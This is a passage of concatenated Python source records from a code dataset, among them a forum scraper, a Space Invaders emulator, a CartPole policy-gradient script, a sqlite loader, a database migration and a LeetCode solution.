int(\"\".join(re.findall(r\"\\\"height\\\"\\: (.+?)\\}\", obj_str)))\n except ValueError:\n c = int(\"\".join(re.findall(r\"\\\"width\\\"\\: (.+?)\\}\", obj_str)))\n d = int(\"\".join(re.findall(r\"\\\"height\\\"\\: (.+?)\\,\", obj_str)))\n bbox = [a, b, c, d]\n x = a + c\n y = c + d\n segmentation = [x, y, a, y, a, b, x, b, x, y]\n try:\n px_1 = int(re.findall(r\"\\\"cx\\\"\\: (.+?)\\,\", obj_str)[0])\n py_1 = int(re.findall(r\"\\\"cy\\\"\\: (.+?)\\,\", obj_str)[0])\n px = re.findall(r\"\\\"cx\\\"\\: (.+?)\\,\", obj_str)\n py = re.findall(r\"\\\"cy\\\"\\: (.+?)\\}\", obj_str)\n except ValueError:\n try:\n px_1 = int(re.findall(r\"\\\"cx\\\"\\: (.+?)\\}\", obj_str)[0])\n py_1 = int(re.findall(r\"\\\"cy\\\"\\: (.+?)\\,\", obj_str)[0])\n px = re.findall(r\"\\\"cx\\\"\\: (.+?)\\}\", obj_str)\n py = re.findall(r\"\\\"cy\\\"\\: (.+?)\\,\", obj_str)\n except ValueError:\n px_1 = int(re.findall(r\"\\\"cx\\\"\\: (.+?)\\,\", obj_str)[0])\n py_1 = int(re.findall(r\"\\\"cy\\\"\\: (.+?)\\}\", obj_str)[0])\n px = re.findall(r\"\\\"cx\\\"\\: (.+?)\\,\", obj_str)\n py = re.findall(r\"\\\"cy\\\"\\: (.+?)\\}\", obj_str)\n\n visible = re.findall(r\"\\\"visible\\\"\\: \\\"(.+?)\\\"\", obj_str)\n\n a = int(len(px)/2)\n for j in arange(a):\n if not len(visible) - len(px) == 1:\n print(FC.WARN + \"Label info is wrong!\" + FC.END)\n points = []\n for i in arange(2):\n if visible[i] == '0':\n points.append(0)\n points.append(0)\n points.append(0)\n else:\n points.append(int(px[i+2*j]))\n points.append(int(py[i+2*j]))\n points.append(int(visible[i+2*j]))\n points.insert(3, int((int(px[2*j])+int(px[1+2*j]))/2))\n points.insert(4, int((int(py[2*j])+int(py[1+2*j]))/2))\n points.insert(5, 2)\n print(points)\n annotation_info = {\n \"id\": count,\n \"image_id\": image_id,\n \"category_id\": 1,\n \"iscrowd\": 0,\n \"area\": c * d,\n \"bbox\": bbox,\n \"segmentation\": segmentation,\n \"num_keypoints\": num_keypoints,\n \"keypoints\": points\n }\n coco_output[\"annotations\"].append(annotation_info)\n\n with open('{}'.format(save_dir), 'w') as output_json_file:\n json.dump(coco_output, output_json_file)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"coco/3_keypoints_v1.py","file_name":"3_keypoints_v1.py","file_ext":"py","file_size_in_byte":7669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"355837658","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/6/8 17:37\n# @Author : Olex\n# @File : threadpool_spider.py\n# @Software: PyCharm\n\n\"\"\"\n抓取\n解析\n存储\n\"\"\"\nimport re\nimport ast\nfrom urllib import parse\nfrom datetime import datetime\n\nimport requests\nfrom scrapy import Selector\n\nfrom csdn_spider.models import *\n\ndomain = \"https://bbs.csdn.net\"\nurl_list = []\n\n\ndef get_nodes_json():\n\t# 获取节点列表\n\tleft_menu_text = requests.get(domain + \"/dynamic_js/left_menu.js?csdn\").text\n\tnodes_str_match = re.search(\"forumNodes: (.*])\", left_menu_text)\n\tif nodes_str_match:\n\t\tnodes_str = nodes_str_match.group(1).replace(\"null\", \"None\")\n\t\tnodes_list = ast.literal_eval(nodes_str)\n\t\treturn nodes_list\n\treturn []\n\n\ndef process_nodes_list(nodes_list):\n\t# 提取出所有的url到urls_list\n\tfor item in nodes_list:\n\t\tif \"url\" in item and item[\"url\"]:\n\t\t\turl_list.append(item[\"url\"])\n\t\t\tif \"children\" in item:\n\t\t\t\tprocess_nodes_list(item[\"children\"])\n\n\ndef get_level1_urls(nodes_list):\n\t# 提取第一层的url\n\tlevel1_urls = []\n\tfor item in nodes_list:\n\t\tif \"url\" in item and item[\"url\"]:\n\t\t\tlevel1_urls.append(item[\"url\"])\n\treturn level1_urls\n\n\ndef get_last_urls():\n\t# 剔除第一层的url,得到最终需要的url\n\tnodes_list = get_nodes_json()\n\tprocess_nodes_list(nodes_list)\n\tlevel1_urls = get_level1_urls(nodes_list)\n\tlast_url = []\n\tfor url in url_list:\n\t\tif url not in level1_urls:\n\t\t\tlast_url.append(url)\n\tall_urls = []\n\tfor url in last_url:\n\t\tall_urls.append(parse.urljoin(domain, url))\n\t\tall_urls.append(parse.urljoin(domain, url + \"/recommend\"))\n\t\tall_urls.append(parse.urljoin(domain, url + \"/closed\"))\n\treturn all_urls\n\n\ndef parse_topic(topic_url):\n\t# 获取帖子详情及回复\n\tprint(\"解析帖子详情页: {}\".format(topic_url))\n\ttopic_id = topic_url.split('/')[-1]\n\tres_text = requests.get(topic_url).text\n\tsel = Selector(text=res_text)\n\tall_divs = sel.xpath(\"//div[starts-with(@id,'post-')]\")\n\n\ttopic_item = all_divs[0]\n\tcontent = topic_item.xpath(\".//div[@class='post_body post_body_min_h']\").extract()[0]\n\tpraised_nums = topic_item.xpath(\".//label[@class='red_praise digg']//em/text()\").extract()[0]\n\tjtl_str = topic_item.xpath(\".//div[@class='close_topic']/text()\").extract()[0]\n\tjtl = 0\n\t# 匹配百分数\n\tjtl_match = re.search('(100|[1-9]?\\d(\\.\\d\\d?\\d?)?)%$|0$', jtl_str, re.M)\n\tif jtl_match:\n\t\tjtl = float(jtl_match.group(1))\n\n\texisted_topics = Topic.select().where(Topic.id == topic_id)\n\tif existed_topics:\n\t\ttopic = existed_topics[0]\n\t\ttopic.content = content\n\t\ttopic.praised_nums = int(praised_nums)\n\t\ttopic.jtl = jtl\n\n\t\ttopic.save()\n\n\tfor answer_item in all_divs[1:]:\n\t\tauthor_info = answer_item.xpath(\".//div[@class='nick_name']//a[1]/@href\").extract()[0]\n\t\tauthor_id = author_info.split(\"/\")[-1]\n\t\tcreate_time_str = answer_item.xpath(\".//label[@class='date_time']/text()\").extract()[0]\n\t\tcreate_time = datetime.strptime(create_time_str, \"%Y-%m-%d %H:%M:%S\")\n\t\tanswer_content = answer_item.xpath(\".//div[@class='post_body post_body_min_h']\").extract()[0]\n\t\tanswer_praised_nums = answer_item.xpath(\".//label[@class='red_praise digg']//em/text()\").extract()[0]\n\n\t\tanswer_id = answer_item.xpath(\".//@data-post-id\").extract()[0]\n\n\t\tanswer = Answer()\n\n\t\tanswer.id = int(answer_id)\n\t\tanswer.topic_id = topic_id\n\t\tanswer.author = author_id\n\t\tanswer.create_time = create_time\n\t\tanswer.praised_nums = int(answer_praised_nums)\n\t\tanswer.content = answer_content\n\n\t\texisted_answer = Answer.select().where(Answer.id == answer_id)\n\t\tif existed_answer:\n\t\t\tanswer.save()\n\t\telse:\n\t\t\tanswer.save(force_insert=True)\n\n\tnext_page = sel.xpath(\"//a[@class='pageliststy next_page']/@href\").extract()\n\tif next_page:\n\t\tnext_url = parse.urljoin(domain, next_page[0])\n\t\texecutor.submit(parse_topic, next_url)\n\n\ndef parse_author(url):\n\tauthor_id = url.split(\"/\")[-1]\n\t# 获取用户的详情\n\tprint(\"解析用户的详情页: {}\".format(url))\n\n\theaders = {\n\t\t'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',\n\t}\n\tres_text = requests.get(url, headers=headers).text\n\tsel = Selector(text=res_text)\n\tauthor = Author()\n\tauthor.id = author_id\n\tall_li_strs = sel.xpath(\"//ul[@class='mod_my_t clearfix']/li/span/text()\").extract()\n\tclick_nums = all_li_strs[0]\n\toriginal_nums = all_li_strs[1]\n\tforward_nums = int(all_li_strs[2])\n\trate = int(all_li_strs[3])\n\tanswer_nums = int(all_li_strs[4])\n\tpraised_nums = int(all_li_strs[5])\n\n\tauthor.click_nums = click_nums\n\tauthor.original_nums = original_nums\n\tauthor.forward_nums = forward_nums\n\tauthor.rate = rate\n\tauthor.answer_nums = answer_nums\n\tauthor.praised_nums = praised_nums\n\n\tdesc = sel.xpath(\"//dd[@class='user_desc']/text()\").extract()\n\tif desc:\n\t\tauthor.desc = desc[0].strip()\n\tperson_b = sel.xpath(\"//dd[@class='person_b']/ul/li\")\n\tfor item in person_b:\n\t\titem_text = \"\".join(item.extract())\n\t\tif \"csdnc-m-add\" in item_text:\n\t\t\tlocation = item.xpath(\".//span/text()\").extract()[0].strip()\n\t\t\tauthor.location = location\n\t\telse:\n\t\t\tindustry = item.xpath(\".//span/text()\").extract()[0].strip()\n\t\t\tauthor.industry = industry\n\tname = sel.xpath(\"//h4[@class='username']/text()\").extract()[0]\n\tauthor.name = name.strip()\n\texisted_author = Author.select().where(Author.id == author_id)\n\tif existed_author:\n\t\tauthor.save()\n\telse:\n\t\tauthor.save(force_insert=True)\n\n\ndef parse_list(url):\n\t# 提取列表页数据\n\tprint(\"解析列表页: {}\".format(url))\n\tres_text = requests.get(url).text\n\tsel = Selector(text=res_text)\n\tall_trs = sel.xpath(\"//table[@class='forums_tab_table']//tbody//tr\")\n\tfor tr in all_trs:\n\t\tstatus = tr.xpath(\".//td[1]/span/text()\").extract()[0]\n\t\tscore = tr.xpath(\".//td[2]/em/text()\").extract()[0]\n\t\ttopic_url = parse.urljoin(domain, tr.xpath(\".//td[3]/a[contains(@class,'forums_title')]/@href\").extract()[0])\n\t\ttopic_id = int(topic_url.split(\"/\")[-1])\n\t\ttopic_title = tr.xpath(\".//td[3]/a[contains(@class,'forums_title')]/text()\").extract()[0]\n\t\tauthor_url = parse.urljoin(domain, tr.xpath(\".//td[4]/a/@href\").extract()[0])\n\t\tauthor_id = author_url.split(\"/\")[-1]\n\t\tcreate_time_str = tr.xpath(\".//td[4]/em/text()\").extract()[0]\n\t\tcreate_time = datetime.strptime(create_time_str, \"%Y-%m-%d %H:%M\")\n\t\tanswer_info = tr.xpath(\".//td[5]/span/text()\").extract()[0]\n\t\tanswer_nums = int(answer_info.split(\"/\")[0])\n\t\tclick_nums = int(answer_info.split(\"/\")[1])\n\t\tlast_time_str = tr.xpath(\".//td[6]/em/text()\").extract()[0]\n\t\tlast_time = datetime.strptime(last_time_str, \"%Y-%m-%d %H:%M\")\n\n\t\ttopic = Topic()\n\n\t\ttopic.id = topic_id\n\t\ttopic.title = topic_title\n\t\ttopic.author = author_id\n\t\ttopic.click_nums = click_nums\n\t\ttopic.answer_nums = answer_nums\n\t\ttopic.create_time = create_time\n\t\ttopic.last_answer_time = last_time\n\t\ttopic.score = score\n\t\ttopic.status = status\n\n\t\texisted_topic = Topic.select().where(Topic.id == topic.id)\n\t\tif existed_topic:\n\t\t\ttopic.save()\n\t\telse:\n\t\t\ttopic.save(force_insert=True)\n\n\t\texecutor.submit(parse_author, author_url)\n\t\texecutor.submit(parse_topic, topic_url)\n\n\tnext_page = sel.xpath(\"//a[@class=pageliststy next_page']/@href\").extract()\n\tif next_page:\n\t\tnext_url = parse.urljoin(domain, next_page[0])\n\t\texecutor.submit(parse_list, next_url)\n\n\nif __name__ == \"__main__\":\n\tfrom concurrent.futures import ThreadPoolExecutor\n\n\texecutor = ThreadPoolExecutor(max_workers=10)\n\n\tlast_urls = get_last_urls()\n\tfor url in last_urls:\n\t\texecutor.submit(parse_list, url)\n","sub_path":"threading_spider/threadpool_spider.py","file_name":"threadpool_spider.py","file_ext":"py","file_size_in_byte":7282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"368719815","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\nCreated in February 2017 in ComplexCity Lab\n\n@author: github.com/fpfaende\n\nwhat it does\nextract a graph from \n\nparameters\ngraph\n\nhow it works\n\nreturn\n\n\n'''\n\nimport sys\nsys.path.insert(0, '/Users/fabien/workspace/github/policosm')\n\nimport networkx as nx\nfrom shapely.geometry import Polygon, LineString\n\n\ndef getCentroidsFromRoadsGraph(graph):\n\tlines = []\n\tfor u,v in graph.edges():\n\t\tucoo = (graph.node[u]['longitude'], graph.node[u]['latitude'])\n\t\tvcoo = (graph.node[v]['longitude'], graph.node[v]['latitude'])\n\t\tline = LineString([ucoo,vcoo])\n\t\tx = line.centroid.x\n\t\ty = line.centroid.y\n\t\tlines.append((x,y))\n\treturn lines\n\n\ndef getCentroidFromRoadsGraph(graph):\n\tlines = getCentroidsFromRoadsGraph(graph)\n\tx=0\n\ty=0\n\tfor xc, yc in lines:\n\t\tx += xc\n\t\ty += yc\n\tx = x / float(len(lines))\n\ty = y / float(len(lines))\n\treturn (x,y)\n\nif __name__ == \"__main__\":\n\ttestGraph = nx.Graph()\n\ttestGraph.add_node(1,longitude=1.0, latitude=1.0)\n\ttestGraph.add_node(2,longitude=2.0, latitude=2.0)\n\ttestGraph.add_edge(1, 2,osmid=3,highway='residential',level=3, lanes=1, oneway=False)\n\tassert getCentroidFromRoadsGraph(testGraph) == (1.5,1.5)","sub_path":"tests/functions/testGetCentroidFromRoadsGraph.py","file_name":"testGetCentroidFromRoadsGraph.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"472239093","text":"size(600, 600)\n\nbackground_color = 0\nbase_color = 30\nrandom_color_variability = 100\nsparseness = 60\nframe_offset = 100\nmin_line_length = 50\nmax_line_length = 100\ndrawing_area_x = width - frame_offset\ndrawing_area_y = height - frame_offset\n\nbackground(background_color)\n\nfor x in range(frame_offset, drawing_area_x):\n for y in range(frame_offset, drawing_area_y):\n should_draw = int(random(0, sparseness)) == 0\n if should_draw:\n line_length = random(min_line_length, max_line_length)\n random_color = random(-random_color_variability, random_color_variability)\n stroke(base_color + random_color)\n line(x, y, min(x + line_length, drawing_area_x), min(y + line_length, drawing_area_y))\n \n# save(\"output.png\")\n","sub_path":"converging_box/converging_box.pyde","file_name":"converging_box.pyde","file_ext":"pyde","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"311020056","text":"import os\nimport time\nimport ctypes\nimport struct\nimport pygame\nimport pickle\n\nimport cpu\nfrom cheats import SpaceInvadersCheatEngine\n\nMIN_WIDTH = 256\nMIN_HEIGHT = 224\n\n\nclass Emulator:\n \"\"\"\n Contains 8080 CPU and uses Pygame to display the VRAM\n\n Controls:\n 1. Press 'c' key to insert coin\n 2. Press '1' key to choose 1 player\n 3. Press '2' key to choose 2 players\n 4. Press arrow keys to move (either player)\n 5. Press 'Space' to shoot\n\n Cheats:\n 1. Press 'k' to kill all aliens\n 2. Press 's' to die\n 3. Press 'l' to add lives\n 4. Press 'x' to break score\n\n\n \"\"\"\n\n BLACK = (0, 0, 0)\n WHITE = (255, 255, 255)\n RED = (255, 0, 0)\n GREEN = (0, 255, 0)\n ASPECT_RATIO = MIN_WIDTH / MIN_HEIGHT\n CAPTION_FORMAT = 'Py8080: {}'\n MEMORY_MAPS = {\n \"cpudiag\": [\n (0x0100, \"cpudiag\")\n ],\n\n \"space_invaders\": [\n (0x0000, \"invaders.h\"),\n (0x0800, \"invaders.g\"),\n (0x1000, \"invaders.f\"),\n (0x1800, \"invaders.e\")\n ],\n\n \"lunar_rescue\": [\n (0x0000, \"lrescue.1\"),\n (0x0800, \"lrescue.2\"),\n (0x1000, \"lrescue.3\"),\n (0x1800, \"lrescue.4\"),\n (0x4000, \"lrescue.5\"),\n (0x4800, \"lrescue.6\")\n ],\n\n \"balloon_bomber\": [\n (0x0000, \"tn01\"),\n (0x0800, \"tn02\"),\n (0x1000, \"tn03\"),\n (0x1800, \"tn04\"),\n (0x4000, \"tn05-1\")\n ]\n }\n\n def __init__(self, path=None, mapname=None, width=MIN_WIDTH):\n if path:\n self._cpu = cpu.CPU(path=path)\n self._cpu.init_instruction_table()\n self._cheats = SpaceInvadersCheatEngine(self._cpu.memory)\n elif mapname:\n self._cpu = cpu.CPU(rom=self._create_memory(mapname))\n self._cpu.init_instruction_table()\n self._cheats = SpaceInvadersCheatEngine(self._cpu.memory)\n else:\n # From save state\n self._cpu = None\n self._cheats = None\n\n self._path = path\n self._width = max(MIN_WIDTH, width)\n self._height = round(self._width / self.ASPECT_RATIO)\n self._scaled_width = self._width\n self._scaled_height = self._height\n self._window_width = self._height\n self._window_height = self._width\n self._px_array = None\n self._fps = 60\n\n def _create_memory(self, mapname):\n \"\"\"\n Concatenate files to correct locations in memory\n\n :return: Array of integers\n \"\"\"\n memory = []\n for t in self.MEMORY_MAPS[mapname]:\n while len(memory) < t[0]:\n memory.append(0)\n with open('rom/'+t[1], 'rb') as f:\n while True:\n byte = f.read(1)\n if not byte:\n break\n a, = struct.unpack('c', byte)\n memory.append(ord(a))\n return memory\n\n def _refresh(self):\n \"\"\"\n Update the pixel array\n\n :return:\n \"\"\"\n j_range = int(self._width * 0.125)\n k_range = j_range // 4\n\n for i in range(self._height):\n index = self._cpu.VRAM_ADDRESS + (i << 5)\n\n for j in range(j_range):\n if 23 < j < 28:\n on = self.RED\n elif 1 < j < 9 or (j < 2 and 24 < i < 136):\n on = self.GREEN\n else:\n on = self.WHITE\n vram = self._cpu.memory[index]\n index += 1\n for k in range(k_range):\n y = self._width - 1 - j*k_range - k\n\n if (vram & 0x01) == 1:\n self._px_array[i][y] = on\n else:\n self._px_array[i][y] = self.BLACK\n\n vram >>= 1\n\n def _play_audio(self):\n if self._cpu.io.out_port3 != self._last_port3:\n if self._repeating_sound and self._cpu.io.out_port3 & 0x1 and not (self._last_port3 & 0x1):\n pygame.mixer.music.play(-1)\n elif self._repeating_sound and not (self._cpu.io.out_port3 & 0x1) and self._last_port3 & 0x1:\n pygame.mixer.music.stop()\n if self._sounds[0] and self._cpu.io.out_port3 & 0x2 and not (self._last_port3 & 0x2):\n self._main_audio.play(self._sounds[0])\n if self._sounds[1] and self._cpu.io.out_port3 & 0x4 and not (self._last_port3 & 0x4):\n self._main_audio.play(self._sounds[1])\n if self._sounds[2] and self._cpu.io.out_port3 & 0x8 and not (self._last_port3 & 0x8):\n self._main_audio.play(self._sounds[2])\n self._last_port3 = self._cpu.io.out_port3\n\n if self._cpu.io.out_port5 != self._last_port5:\n if self._sounds[3] and self._cpu.io.out_port5 & 0x1 and not (self._last_port5 & 0x1):\n self._main_audio.play(self._sounds[3])\n if self._sounds[4] and self._cpu.io.out_port5 & 0x2 and not (self._last_port5 & 0x2):\n self._main_audio.play(self._sounds[4])\n if self._sounds[5] and self._cpu.io.out_port5 & 0x4 and not (self._last_port5 & 0x4):\n self._main_audio.play(self._sounds[5])\n if self._sounds[6] and self._cpu.io.out_port5 & 0x8 and not (self._last_port5 & 0x8):\n self._main_audio.play(self._sounds[6])\n if self._sounds[7] and self._cpu.io.out_port5 & 0x10 and not (self._last_port5 & 0x10):\n self._main_audio.play(self._sounds[7])\n self._last_port5 = self._cpu.io.out_port5\n\n def _handle(self, event):\n if event.type == pygame.QUIT:\n exit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_c:\n self._cpu.io.in_port1 |= 0x01\n if event.key == pygame.K_2:\n self._cpu.io.in_port1 |= 0x02\n if event.key == pygame.K_1:\n self._cpu.io.in_port1 |= 0x04\n if event.key == pygame.K_SPACE:\n self._cpu.io.in_port1 |= 0x10\n self._cpu.io.in_port2 |= 0x10\n if event.key == pygame.K_LEFT:\n self._cpu.io.in_port1 |= 0x20\n self._cpu.io.in_port2 |= 0x20\n if event.key == pygame.K_RIGHT:\n self._cpu.io.in_port1 |= 0x40\n self._cpu.io.in_port2 |= 0x40\n if event.key == pygame.K_6:\n # Save state\n self.save()\n if event.key == pygame.K_s:\n self._cheats.hack_kill_player()\n if event.key == pygame.K_k:\n self._cheats.hack_kill_mobs()\n if event.key == pygame.K_l:\n self._cheats.hack_add_lives()\n if event.key == pygame.K_x:\n self._cheats.hack_score()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_c:\n self._cpu.io.in_port1 &= 255 - 0x01\n if event.key == pygame.K_2:\n self._cpu.io.in_port1 &= 255 - 0x02\n if event.key == pygame.K_1:\n self._cpu.io.in_port1 &= 255 - 0x04\n if event.key == pygame.K_SPACE:\n self._cpu.io.in_port1 &= 255 - 0x10\n self._cpu.io.in_port2 &= 255 - 0x10\n if event.key == pygame.K_LEFT:\n self._cpu.io.in_port1 &= 255 - 0x20\n self._cpu.io.in_port2 &= 255 - 0x20\n if event.key == pygame.K_RIGHT:\n self._cpu.io.in_port1 &= 255 - 0x40\n self._cpu.io.in_port2 &= 255 - 0x40\n\n if event.type == pygame.VIDEORESIZE:\n self._window_width, self._window_height = event.w, event.h\n if self._window_width < 224:\n self._window_width = 224\n if self._window_height < 256:\n self._window_height = 256\n self._scaled_width = self._window_height\n self._scaled_height = self._window_width\n if self._window_width/self._window_height > self._height/self._width:\n self._scaled_height = int(\n self._window_height * self._height/self._width)\n if self._window_width/self._window_height < self._height/self._width:\n self._scaled_width = int(\n self._window_width * self._width/self._height)\n self._window = pygame.display.set_mode(\n (self._window_width, self._window_height), pygame.RESIZABLE)\n self._scaled_surface = pygame.Surface(\n (self._scaled_height, self._scaled_width))\n\n def save(self):\n \"\"\"\n Save CPU state to disk\n\n :return:\n \"\"\"\n\n timestamp = round(time.time())\n state_path = 'saves/{}_{}.pickle'.format(self._path, timestamp)\n with open(state_path, 'wb') as state_file:\n pickle.dump(self._cpu, state_file)\n\n @classmethod\n def load(cls, state):\n \"\"\"\n Load CPU state from disk\n\n :param state: Pickle file\n :return:\n \"\"\"\n\n with open(\"saves/\" + state, 'rb') as state_file:\n cpu = pickle.load(state_file)\n\n emu = cls()\n emu._cpu = cpu\n emu._cheats = SpaceInvadersCheatEngine(cpu.memory)\n return emu\n\n def run(self):\n \"\"\"\n Sets up display and starts game loop\n\n :return:\n \"\"\"\n ctypes.windll.user32.SetProcessDPIAware()\n pygame.init()\n self._main_audio = pygame.mixer.Channel(0)\n self._sounds = []\n self._repeating_sound = False\n self._last_port3 = self._cpu.io.out_port3\n self._last_port5 = self._cpu.io.out_port5\n self._window = pygame.display.set_mode(\n (self._window_width, self._window_height), pygame.RESIZABLE)\n surface = pygame.Surface((self._height, self._width))\n self._scaled_surface = pygame.Surface(\n (self._scaled_height, self._scaled_width))\n caption = self.CAPTION_FORMAT.format(self._path if self._path else '')\n pygame.display.set_caption(caption)\n self._px_array = pygame.PixelArray(surface)\n pygame.display.update()\n fps_clock = pygame.time.Clock()\n if os.path.exists('sound/0.wav'):\n pygame.mixer.music.load('sound/0.wav')\n self._repeating_sound = True\n for i in range(1, 9):\n if os.path.exists('sound/{0}.wav'.format(i)):\n self._sounds.append(pygame.mixer.Sound(\n 'sound/{0}.wav'.format(i)))\n else:\n self._sounds.append(None)\n\n while True:\n for event in pygame.event.get():\n self._handle(event)\n\n self._cpu.run()\n self._refresh()\n self._play_audio()\n fps_clock.tick(self._fps)\n pygame.transform.scale(\n surface, (self._scaled_height, self._scaled_width), self._scaled_surface)\n horizontal_pos = int(\n (self._window_width - self._scaled_surface.get_width()) / 2)\n vertical_pos = int(\n (self._window_height - self._scaled_surface.get_height()) / 2)\n self._window.blit(self._scaled_surface,\n (horizontal_pos, vertical_pos))\n pygame.display.update()\n","sub_path":"emulator.py","file_name":"emulator.py","file_ext":"py","file_size_in_byte":11392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"650888434","text":"import gym\nimport numpy as np\n\n\ndef mc_policy_gradient(env, theta, lr, episodes):\n for episode in range(episodes): # 迭代 episode\n episode = []\n start_observation = env.reset() # 初始化环境\n t = 0\n while True:\n env.render() # notebook 不支持渲染环境\n policy = np.dot(theta, start_observation) # 计算策略值\n # 这里的 action_space 为 2, 故使用 Sigmoid 激活函数处理策略值\n pi = 1 / (1 + np.exp(-policy))\n if pi >= 0.5:\n action = 1 # 向右施加力\n else:\n action = 0 # 向左施加力\n next_observation, reward, done, _ = env.step(action) # 执行动作\n # 将环境返回结果添加到 episode 中\n episode.append([next_observation, action, pi, reward])\n start_observation = next_observation # 将返回 observation 作为下一次迭代 observation\n t += 1\n if done:\n print(\"Episode finished after {} timesteps\".format(t))\n break\n # 根据上一次 episode 更新参数 theta\n for timestep in episode:\n observation, action, pi, reward = timestep\n theta += lr * (1 - pi) * np.transpose(-observation) * reward\n\n return theta\n\n\nif __name__ == '__main__':\n lr = 0.005\n theta = np.random.rand(4)\n episodes = 10\n env = gym.make('CartPole-v1')\n mc_policy_gradient(env, theta, lr, episodes)","sub_path":"Answers/week8-challenge-03/mc_cartpole.py","file_name":"mc_cartpole.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"87167948","text":"import sqlite3 as lite\nimport csv\n\nDATABASE = \"test.db\"\n \ndef create_table(name,qtable):\n\tcon = lite.connect(DATABASE)\n\tcur = con.cursor() \n\t\n\twith con:\n\t\tcur.execute(qtable)\n\t\tprint(\"Created table \" + name)\n\n\tcleartable = \"delete from \" + name\n\twith con:\n\t\tcur.execute(cleartable)\n\t\t\n\tcon.close()\t\n\t\t\n\t\ndef create_deps():\n\tcon = lite.connect(DATABASE)\n\tcur = con.cursor() \n\n\tcleartable = \"delete from departments\"\n\twith con:\n\t\tcur.execute(cleartable)\n\t\t\n\treader = csv.reader(open('D:\\departments.csv', 'r'),delimiter=\";\")\n\tfor row in reader:\n\t\tname = \"department\"+row[0]\n\t\tqtable = \"CREATE TABLE IF NOT EXISTS \"+name+\" (id Integer PRIMARY KEY AUTOINCREMENT, timecreate DateTime, timeupdate DateTime, kod1c Integer, sk Text, qty Double, idDep integer)\"\n\t\tcreate_table(name, qtable)\n\t\n\t\tiquery = \"Insert into departments (id,name) values (\"+row[0]+\",'\"+row[1]+\"')\"\n\t\twith con:\n\t\t\tcur.execute(iquery)\n\t\t\t\n\tcon.close()\t\t\n\t\t\t\ndef fill_goods():\n\tcon = lite.connect(DATABASE)\n\tcur = con.cursor() \n\tcleartable = \"delete from goods\"\n\twith con:\n\t\tcur.execute(cleartable)\n\t\t\n\ti = ii = 0 \n\treader = csv.reader(open('D:\\goods.csv', 'r'),delimiter=\";\")\n\tfor row in reader:\n\t\ti += 1\n\t\tname = row[2]\n\t\tname = name.replace(\"'\",\"`\")\n\t\tqtable = \"insert or replace into goods (sk,kod1c,name) values ('\"+row[1]+\"','\"+row[0]+\"','\"+name+\"')\"\n\t\tcur.execute(qtable)\n\t\tcon.commit()\n\t\tif i == 1000:\n\t\t\ti = 0\n\t\t\tii += 1\n\t\t\tprint(ii)\n\t\n# Створимо відділи\ncreate_deps()\n\n# Заповнимо товарами\n# fill_goods()\n\n\n\n\t\n ","sub_path":"create_db_for_tablet.py","file_name":"create_db_for_tablet.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"311242913","text":"\"\"\"empty message\n\nRevision ID: affdea0e2edd\nRevises: e333d0326181\nCreate Date: 2021-01-18 02:29:58.593628\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'affdea0e2edd'\ndown_revision = 'e333d0326181'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('history', 'url')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('history', sa.Column('url', sa.VARCHAR(length=200), autoincrement=False, nullable=False))\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/affdea0e2edd_.py","file_name":"affdea0e2edd_.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"221876171","text":"#\n# [637] Average of Levels in Binary Tree\n#\n# https://leetcode.com/problems/average-of-levels-in-binary-tree/description/\n#\n# algorithms\n# Easy (55.95%)\n# Total Accepted: 43.9K\n# Total Submissions: 78.6K\n# Testcase Example: '[3,9,20,15,7]'\n#\n# Given a non-empty binary tree, return the average value of the nodes on each\n# level in the form of an array.\n#\n# Example 1:\n#\n# Input:\n# ⁠ 3\n# ⁠ / \\\n# ⁠ 9 20\n# ⁠ / \\\n# ⁠ 15 7\n# Output: [3, 14.5, 11]\n# Explanation:\n# The average value of nodes on level 0 is 3, on level 1 is 14.5, and on level\n# 2 is 11. Hence return [3, 14.5, 11].\n#\n#\n#\n# Note:\n#\n# The range of node's value is in the range of 32-bit signed integer.\n#\n#\n#\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nfrom collections import deque\n\n\nclass Solution:\n def averageOfLevels(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[float]\n \"\"\"\n if root is None:\n return []\n\n ret = []\n depth = 0\n total = 0\n count = 0\n pool = deque([(root, 0)])\n\n while pool:\n node, d = pool.popleft()\n\n if d == depth:\n count += 1\n total += node.val\n\n else:\n ret.append(total / float(count))\n depth += 1\n total = node.val\n count = 1\n\n for child in [node.left, node.right]:\n if child:\n pool.append((child, d + 1))\n\n if count > 0:\n ret.append(total / float(count))\n\n return ret\n","sub_path":"src/637.average-of-levels-in-binary-tree.python3.py","file_name":"637.average-of-levels-in-binary-tree.python3.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"369021208","text":"import sys, psutil, os, re, subprocess, time, ConfigParser, socket, threading\n\n## killTasks\ndef killTasks(procnames):\n try:\n for proc in 